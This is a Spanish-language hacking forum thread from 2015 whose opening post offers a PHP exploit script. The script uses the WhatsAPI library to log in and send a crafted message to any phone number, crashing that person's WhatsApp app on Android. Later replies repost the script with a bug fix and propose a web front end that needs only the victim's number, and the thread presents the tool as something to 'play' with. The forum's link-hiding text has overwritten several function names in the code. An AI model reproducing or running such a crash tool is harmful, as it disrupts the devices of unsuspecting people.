[PHP] Crashear WhatsApp usando WhatsAPI

« **en:** Febrero 05, 2015, 09:52:54 am »

Que tal?. Les traigo un pequeño script en php que crashea el app de whatsapp en Android, que hasta el día de la fecha funciona. Pero esta vez usando un API en php de whatsapp; WhatsAPI.

Modo de uso de script

Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

root@rodrix:~# php wacrash.php 549XXXXXXXXXX
Recuerden que el num de contacto que van a crashear debe ser de 13 dígitos. En la variable $msg deben copiar y pegar el contenido del pastebin que dejo en el comentario, donde se encuentran los caracteres especiales para crashear whatsapp.

Código: PHP

<?php
 
/*
 *      Title: WhatsApp Remote Crash with PHP
 *      Product: WhatsApp
 *      Vendor Homepage: http://www.whatsapp.com
 *      Vulnerable Version(s): 2.11.476
 *      Tested on: WhatsApp v2.11.476 on Samsung Galaxy S4 2015 -Android 4.3
 *      Mirror: http://pastebin.com/Ktu45GN0
 *      Date: 05/02/2015
 * 
 *      Author Exploit:
 *              Rodrigo Avila - @el_rodrix - <rodrigo398@hotmail.com>
 *      Credits: 
 *              Daniel Godoy - @0xhielasangre - <danielgodoy@gobiernofederal.com>
 *              Gonza Cabrera - @Gonnza_Cabrera - <gonnza.cabrera@gmail.com>
 * 
 *      Reference: http://foro.remoteexecution.net/index.php/topic,569.0.html
 *                  http://underc0de.org/foro/android/(poc)-crashear-la-app-de-un-contacto-de-whatsapp-(android)/msg82880/
 *                 http://www.exploit-db.com/exploits/35637/
 *                 http://www.exploit-db.com/exploits/32865/
 * 
 *      Custom message with non-printable characters will crash any WhatsApp client < v2.11.476 for android.
 *      It uses WhatsAPI library, that provides us with the options of registration, reading/sending messages, and even
 *      engaging in an interactive conversation over WhatsApp protocol
 */
 
require 'src/whatsprot.class.php';
 
function fgets_u($pStdn)
{
    $pArr = You are not allowed to view links.
 You are not allowed to view links.
 Register or Login or You are not allowed to view links.
 Register or Login($pStdn);
 
    if (false === ($num_changed_streams = You are not allowed to view links.
 You are not allowed to view links.
 Register or Login or You are not allowed to view links.
 Register or Login($pArr, $write = NULL, $except = NULL, 0))) {
        print("\$ 001 Socket Error : UNABLE TO WATCH STDIN.\n");
 
        return FALSE;
    } elseif ($num_changed_streams > 0) {
        return You are not allowed to view links.
 You are not allowed to view links.
 Register or Login or You are not allowed to view links.
 Register or Login(You are not allowed to view links.
 You are not allowed to view links.
 Register or Login or You are not allowed to view links.
 Register or Login($pStdn, 1024));
    }
    return null;
}
$nickname = "RemoteExecution";
$sender = "549XXXXXXXXXX"; // Mobile number with country code (but without + or 00)
$imei = ""; // MAC Address for iOS IMEI for other platform (Android/etc)
$password = "XXXXXXXXXXXXXXXXXXXXXXXXXXXX"; // Password you received from WhatsApp
$msg = "RemoteExecution"; //Copy paste and send this message -> http://pastebin.com/bStYBbpd
$usage = "USAGE: ".$_SERVER['argv'][0]." <phone>\n \tphone: full number including country code, without '+' or '00'\n";
 
if ($argc < 2) {
    echo $usage;
    You are not allowed to view links.
 You are not allowed to view links.
 Register or Login or You are not allowed to view links.
 Register or Login(1);
}
 
if (You are not allowed to view links.
 You are not allowed to view links.
 Register or Login or You are not allowed to view links.
 Register or Login($_SERVER['argv'][1])){
        if (You are not allowed to view links.
 You are not allowed to view links.
 Register or Login or You are not allowed to view links.
 Register or Login($_SERVER['argv'][1]) == 13){ 
                $dst = $_SERVER['argv'][1];
                echo "[] Logging in as '$nickname' ($sender)\n";
                $wa = new WhatsProt($sender, $imei, $nickname, false);
 
                $wa->connect();
                $wa->loginWithPassword($password);
 
                echo "\n[] Send message to $dst: $msg\n";
                $wa->sendMessage($dst , $msg);
                echo "\n";
                You are not allowed to view links.
 You are not allowed to view links.
 Register or Login or You are not allowed to view links.
 Register or Login(0);
        }else{
                echo $usage;
        }
}else{
        echo $usage;
}
 

Adjunto screenshot del momento que crashea el app de whatsapp en Android. Para esta PoC se utilizo un Samsung Galaxy S4, con WhatsApp+ v6.65.

Información del dispositivo:

WhatsApp+ crashea:

WhatsApp+ crashea:

Información de WhatsApp app:

Espero que les guste. Saludos.

« **Respuesta #1 en:** Febrero 05, 2015, 10:00:00 am »

Muy bueno bro!
Te dejo +1
Seguro que si lo ve fermino, se pondrá a jugar con esto xD

Saludos!
ANTRAX

« **Respuesta #2 en:** Febrero 05, 2015, 10:11:55 am »

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Muy bueno bro!
Te dejo +1
Seguro que si lo ve fermino, se pondrá a jugar con esto xD

Saludos!
ANTRAX

Gracias. La idea es esa, jugar jaja. Saludos

« **Respuesta #3 en:** Febrero 05, 2015, 11:13:08 am »

Se ve interesante!! ay q probarlooo!

« **Respuesta #4 en:** Febrero 05, 2015, 04:27:26 pm »

interesante, pero agrego un punto y coma ( ; ) que falta en la línea 47, por si alguien lo quiere probar y no le funciona :3

Saludos!

Código: PHP

<?php
 
/*
 *      Title: WhatsApp Remote Crash with PHP
 *      Product: WhatsApp
 *      Vendor Homepage: http://www.whatsapp.com
 *      Vulnerable Version(s): 2.11.476
 *      Tested on: WhatsApp v2.11.476 on Samsung Galaxy S4 2015 -Android 4.3
 *      Mirror: http://pastebin.com/Ktu45GN0
 *      Date: 05/02/2015
 * 
 *      Author Exploit:
 *              Rodrigo Avila - @el_rodrix - <rodrigo398@hotmail.com>
 *      Credits: 
 *              Daniel Godoy - @0xhielasangre - <danielgodoy@gobiernofederal.com>
 *              Gonza Cabrera - @Gonnza_Cabrera - <gonnza.cabrera@gmail.com>
 * 
 *      Reference: http://foro.remoteexecution.net/index.php/topic,569.0.html
 *                  http://underc0de.org/foro/android/(poc)-crashear-la-app-de-un-contacto-de-whatsapp-(android)/msg82880/
 *                 http://www.exploit-db.com/exploits/35637/
 *                 http://www.exploit-db.com/exploits/32865/
 * 
 *      Custom message with non-printable characters will crash any WhatsApp client < v2.11.476 for android.
 *      It uses WhatsAPI library, that provides us with the options of registration, reading/sending messages, and even
 *      engaging in an interactive conversation over WhatsApp protocol
 */
 
require 'src/whatsprot.class.php';
 
function fgets_u($pStdn)
{
    $pArr = You are not allowed to view links.
 You are not allowed to view links.
 Register or Login or You are not allowed to view links.
 Register or Login($pStdn);
 
    if (false === ($num_changed_streams = You are not allowed to view links.
 You are not allowed to view links.
 Register or Login or You are not allowed to view links.
 Register or Login($pArr, $write = NULL, $except = NULL, 0))) {
        print("\$ 001 Socket Error : UNABLE TO WATCH STDIN.\n");
 
        return FALSE;
    } elseif ($num_changed_streams > 0) {
        return You are not allowed to view links.
 You are not allowed to view links.
 Register or Login or You are not allowed to view links.
 Register or Login(You are not allowed to view links.
 You are not allowed to view links.
 Register or Login or You are not allowed to view links.
 Register or Login($pStdn, 1024));
    }
    return null;
}
$nickname = "RemoteExecution";
$sender = "549XXXXXXXXXX"; // Mobile number with country code (but without + or 00)
$imei = ""; // MAC Address for iOS IMEI for other platform (Android/etc)
$password = "XXXXXXXXXXXXXXXXXXXXXXXXXXXX"; // Password you received from WhatsApp
$msg = "RemoteExecution"; //Copy paste and send this message -> http://pastebin.com/bStYBbpd
$usage = "USAGE: ".$_SERVER['argv'][0]." <phone>\n \tphone: full number including country code, without '+' or '00'\n";
 
if ($argc < 2) {
    echo $usage;
    You are not allowed to view links.
 You are not allowed to view links.
 Register or Login or You are not allowed to view links.
 Register or Login(1);
}
 
if (You are not allowed to view links.
 You are not allowed to view links.
 Register or Login or You are not allowed to view links.
 Register or Login($_SERVER['argv'][1])){
        if (You are not allowed to view links.
 You are not allowed to view links.
 Register or Login or You are not allowed to view links.
 Register or Login($_SERVER['argv'][1]) == 13){ 
                $dst = $_SERVER['argv'][1];
                echo "[] Logging in as '$nickname' ($sender)\n";
                $wa = new WhatsProt($sender, $imei, $nickname, false);
 
                $wa->connect();
                $wa->loginWithPassword($password);
 
                echo "\n[] Send message to $dst: $msg\n";
                $wa->sendMessage($dst , $msg);
                echo "\n";
                You are not allowed to view links.
 You are not allowed to view links.
 Register or Login or You are not allowed to view links.
 Register or Login(0);
        }else{
                echo $usage;
        }
}else{
        echo $usage;
}

« **Respuesta #5 en:** Febrero 05, 2015, 06:14:12 pm »

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

interesante, pero agrego un punto y coma ( ; ) que falta en la línea 47, por si alguien lo quiere probar y no le funciona :3

Saludos!
Código: PHP
<?php

/*
* Title: WhatsApp Remote Crash with PHP
* Product: WhatsApp
* Vendor Homepage: http://www.whatsapp.com
* Vulnerable Version(s): 2.11.476
* Tested on: WhatsApp v2.11.476 on Samsung Galaxy S4 2015 -Android 4.3
* Mirror: http://pastebin.com/Ktu45GN0
* Date: 05/02/2015
*
* Author Exploit:
* Rodrigo Avila - @el_rodrix - <rodrigo398@hotmail.com>
* Credits:
* Daniel Godoy - @0xhielasangre - <danielgodoy@gobiernofederal.com>
* Gonza Cabrera - @Gonnza_Cabrera - <gonnza.cabrera@gmail.com>
*
* Reference: http://foro.remoteexecution.net/index.php/topic,569.0.html
* http://underc0de.org/foro/android/(poc)-crashear-la-app-de-un-contacto-de-whatsapp-(android)/msg82880/
* http://www.exploit-db.com/exploits/35637/
* http://www.exploit-db.com/exploits/32865/
*
* Custom message with non-printable characters will crash any WhatsApp client < v2.11.476 for android.
* It uses WhatsAPI library, that provides us with the options of registration, reading/sending messages, and even
* engaging in an interactive conversation over WhatsApp protocol
*/

require 'src/whatsprot.class.php';

function fgets_u($pStdn)
{
$pArr = You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($pStdn);

if (false === ($num_changed_streams = You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($pArr, $write = NULL, $except = NULL, 0))) {
print("\$ 001 Socket Error : UNABLE TO WATCH STDIN.\n");

return FALSE;
} elseif ($num_changed_streams > 0) {
return You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login(You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($pStdn, 1024));
}
return null;
}
$nickname = "RemoteExecution";
$sender = "549XXXXXXXXXX"; // Mobile number with country code (but without + or 00)
$imei = ""; // MAC Address for iOS IMEI for other platform (Android/etc)
$password = "XXXXXXXXXXXXXXXXXXXXXXXXXXXX"; // Password you received from WhatsApp
$msg = "RemoteExecution"; //Copy paste and send this message -> http://pastebin.com/bStYBbpd
$usage = "USAGE: ".$_SERVER['argv'][0]." <phone>\n \tphone: full number including country code, without '+' or '00'\n";

if ($argc < 2) {
echo $usage;
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login(1);
}

if (You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($_SERVER['argv'][1])){
if (You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($_SERVER['argv'][1]) == 13){
$dst = $_SERVER['argv'][1];
echo "[] Logging in as '$nickname' ($sender)\n";
$wa = new WhatsProt($sender, $imei, $nickname, false);

$wa->connect();
$wa->loginWithPassword($password);

echo "\n[] Send message to $dst: $msg\n";
$wa->sendMessage($dst , $msg);
echo "\n";
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login(0);
}else{
echo $usage;
}
}else{
echo $usage;
}

Corregido!. Gracias.

« **Respuesta #6 en:** Febrero 05, 2015, 07:59:03 pm »

Esto esta mas que genial bro, se me ocurre que se podria una api con html que haga falta solo poner el numero, si me das permiso de usar tu code me pongo a ello, no hace falta decir que con creditos tanto en la web como en el post para underc0de.

« **Respuesta #7 en:** Febrero 05, 2015, 11:46:00 pm »

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Esto esta mas que genial bro, se me ocurre que se podria una api con html que haga falta solo poner el numero, si me das permiso de usar tu code me pongo a ello, no hace falta decir que con creditos tanto en la web como en el post para underc0de.

Adelante, todo tuyo. La idea es esa, compartir y que les sirva a los demas. Saludos.

« **Respuesta #8 en:** Febrero 21, 2015, 12:42:47 am »

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Muy bueno bro!
Te dejo +1
Seguro que si lo ve fermino, se pondrá a jugar con esto xD

Saludos!
ANTRAX

Gracias. La idea es esa, jugar jaja. Saludos

xDD
Es que esta API está genial

Tal vez un módulo para You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login?

Cómo llevar dos líneas de WhatsApp en un sólo teléfono Android Iniciado por 54NDR4	Respuestas: 5 Vistas: 3480	Septiembre 12, 2014, 04:48:53 pm por vitoces
Notificaciones flotantes de WhatsApp al estilo de Facebook Messenger Iniciado por ANTRAX	Respuestas: 0 Vistas: 1667	Septiembre 01, 2014, 01:09:39 pm por ANTRAX
[WhatsApp] Herramienta para desencriptar la base de datos Iniciado por Fukie	Respuestas: 23 Vistas: 27269	Mayo 14, 2017, 05:31:56 pm por jgro
WhatsApp Plus 2015 v.6.76 Anti-baneo y Crackeado No [Root] [Esp] [SD] Iniciado por k0rs0	Respuestas: 7 Vistas: 4145	Marzo 30, 2015, 02:29:16 pm por Cl0udswX
Cómo usar WhatsApp en Windows Iniciado por Stiuvert	Respuestas: 3 Vistas: 2344	Octubre 09, 2012, 11:56:08 am por munter

Esta es una respuesta al tema: [PHP] Crashear WhatsApp usando WhatsAPI en La plantilla. Android

[PHP] Crashear WhatsApp usando WhatsAPI

elrodrix

[PHP] Crashear WhatsApp usando WhatsAPI

ANTRAX

Re:[PHP] Crashear WhatsApp usando WhatsAPI

elrodrix

Re:[PHP] Crashear WhatsApp usando WhatsAPI

JNIOR

Re:[PHP] Crashear WhatsApp usando WhatsAPI

DeBobiPro

Re:[PHP] Crashear WhatsApp usando WhatsAPI

elrodrix

Re:[PHP] Crashear WhatsApp usando WhatsAPI

rollth

Re:[PHP] Crashear WhatsApp usando WhatsAPI

elrodrix

Re:[PHP] Crashear WhatsApp usando WhatsAPI

fermino

Re:[PHP] Crashear WhatsApp usando WhatsAPI

Similar topics (5)